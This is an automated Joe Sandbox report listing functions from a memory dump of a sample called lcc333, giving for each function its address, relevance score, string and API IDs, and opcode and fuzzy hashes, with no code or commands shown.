                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $
                                                                                                                                                          • API String ID: 0-227171996
                                                                                                                                                          • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                          • Instruction ID: 0dd1c1ad26e0b5eb83ae903cf4f53bf122ca461e477cdea497b4bff96a7aa074
                                                                                                                                                          • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                          • Instruction Fuzzy Hash: 50E1C732A18E4251E764AE57C8D013DB3A0FF4AB68F946237DA0E477E4EF29D859C710
                                                                                                                                                          Function 00007FF714C8A2DB Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: incorrect header check$invalid window size
                                                                                                                                                          • API String ID: 0-900081337
                                                                                                                                                          • Opcode ID: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                                                                                          • Instruction ID: 7c98957f3e2e0676d49c2fbd210452b5d4bdbe5cd4ce5143d09c8bc3909a5821
                                                                                                                                                          • Opcode Fuzzy Hash: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                                                                                          • Instruction Fuzzy Hash: 0D91FE72A18AC787E7A49F1AC4C9B3E7AA9FF46360F414136DA4A477C0DB39E544CB10
                                                                                                                                                          Function 00007FF714C9DEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: e+000$gfff
                                                                                                                                                          • API String ID: 0-3030954782
                                                                                                                                                          • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                          • Instruction ID: 1905351011519dae1b3dcfbcb7df7f6d619d40ca9b51324733c5ef00e835ad62
                                                                                                                                                          • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                          • Instruction Fuzzy Hash: DC517A22B18AC156E7209E37DC81769EB91E756BB4F889232CB9847BC1EE3DD009C710
                                                                                                                                                          Function 00007FF714CA08C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1010374628-0
                                                                                                                                                          • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                          • Instruction ID: b0fbe33ac808011dd9371a7a7f6a81a3844d786c26e4de1cb55b30f2ecd56649
                                                                                                                                                          • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                          • Instruction Fuzzy Hash: 19029062E1DE5241FA65BF17A880279A680AF43FF0FE54A36DD5D463D1FE3DA4098320
                                                                                                                                                          Function 00007FF714C9DA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: gfffffff
                                                                                                                                                          • API String ID: 0-1523873471
                                                                                                                                                          • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                          • Instruction ID: 083be693e7369632ec4803e9dab1102607ca3a79e3c4941bdf7ec5acf5bc5ab4
                                                                                                                                                          • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                          • Instruction Fuzzy Hash: 1EA16A63B08BC546EB21DF26E8807A9B790EB52BE4F448032DE4D57785EE3DD50AC720
                                                                                                                                                          Function 00007FF714C98794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID: TMP
                                                                                                                                                          • API String ID: 3215553584-3125297090
                                                                                                                                                          • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                          • Instruction ID: d4f668279d0bb1da7c0ffcdda1d1e36c1a0c52179c141648e6015d5874597766
                                                                                                                                                          • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                          • Instruction Fuzzy Hash: 1451B101B28A52A1FA54BE279D8117BD2806F42BF4FC9443BDE0E47786FE3CE4094234
                                                                                                                                                          Function 00007FF714CA3480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                          • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                          • Instruction ID: fe543b386670ecf81482c8d6cc3122548ebfea22c292ddc90014d0cc94e0fcbd
                                                                                                                                                          • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                          • Instruction Fuzzy Hash: 65B09B20E17E01C1ED043F12ACC612452547F45710FD40536C10C40330ED2C15E95710
                                                                                                                                                          Function 00007FF714C935A0 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                          • Instruction ID: b7e06576a643542602605a6d6ace20ff30bfee6610c7dd0189ebdd7cefcba6aa
                                                                                                                                                          • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                          • Instruction Fuzzy Hash: 12D1EA62A08E4255EB28AE27C98423DA791FB0AB68F942137CD0D077E5EF3DD459C760
                                                                                                                                                          Function 00007FF714C89800 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                          • Instruction ID: d3b4ac7b0688e086e6b6780aaba791d67f91f383356c14e9eeae8a72359ff00d
                                                                                                                                                          • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                          • Instruction Fuzzy Hash: 95C18F762181E18BD289EB29E4A94BA73D1F78A30DBD5406BEF87477C5C73CA414DB20
                                                                                                                                                          Function 00007FF714C92C10 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                          • Instruction ID: 82c81fa2e4a4b214edd96bf399116c71d22a74fbb0e6472f1643c405c1a95dc4
                                                                                                                                                          • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                          • Instruction Fuzzy Hash: DFB1D272508B4696E764DF3AC8C013CBBA1E746F58FA80536CA8E43395EF39D449C764
                                                                                                                                                          Function 00007FF714C9E570 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                          • Instruction ID: 29b8842856758f2b6288d8c067303c801aebaa64121d8335e80fe7002f2aa0ff
                                                                                                                                                          • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                          • Instruction Fuzzy Hash: D581C672A08B8196E774DF1AD880379B691FB667B4F944236DA8D43BC5EE3DD4048F10
                                                                                                                                                          Function 00007FF714CA6418 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                          • Opcode ID: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
                                                                                                                                                          • Instruction ID: a2ff17b395fece9ab59ce921152f17b825093480ebf66b28f3c435f810b6e36a
                                                                                                                                                          • Opcode Fuzzy Hash: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
                                                                                                                                                          • Instruction Fuzzy Hash: 21612F23F0894246F764AE6684D467CD580AFD3B70FA84A3BD69D436C4FE7DE8088720
                                                                                                                                                          Function 00007FF714C91D54 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                          • Instruction ID: a843bf34246a7e0b8a00c2c5587b1bd51e94ecb7ab6fe5c388cd7b067255059e
                                                                                                                                                          • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                          • Instruction Fuzzy Hash: 8B51A837A18E5292F7259F2AC48523873A0EB86B78F684136CE4D07794DF3AE857C750
                                                                                                                                                          Function 00007FF714C92164 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                          • Instruction ID: 4f123c5cf79072393f03df8a4bc2eefb3d83bef862f32dbb24f9bfad76674efb
                                                                                                                                                          • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                          • Instruction Fuzzy Hash: FF51A936A18E5191E7249F2AC88023873A2FB56B78F644532CECD17794DB3AEC57C750
                                                                                                                                                          Function 00007FF714C91944 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                          • Instruction ID: c8f90a9ef4d8d58d5f8817752da4f731b3493f16635bc779d4b18bb077c1926f
                                                                                                                                                          • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                          • Instruction Fuzzy Hash: 8951EB76A14E5191F7249F1AC48123873A0EB86B78F64423ACE8D17798EF3AEC47C750
                                                                                                                                                          Function 00007FF714C91F60 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                          • Instruction ID: d759c25e625a3be379a86d42e7ac3f715acaeed28623c0d0e17a50954fc043a5
                                                                                                                                                          • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                          • Instruction Fuzzy Hash: C151F936A18E5591F7249F2AC480238B3A1EB46F68F645036CE8C07795EF3AEC57C750
                                                                                                                                                          Function 00007FF714C91740 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                          • Instruction ID: 8fb49703b9e45132b01a3925dd3b6dcf439329603f41d1b8f9ca1848a6181724
                                                                                                                                                          • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                          • Instruction Fuzzy Hash: F051C736A14E5195F7249F2AC48123877A1EB86B78FA54136CE4C07794EF3AE847C750
                                                                                                                                                          Function 00007FF714C91B50 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
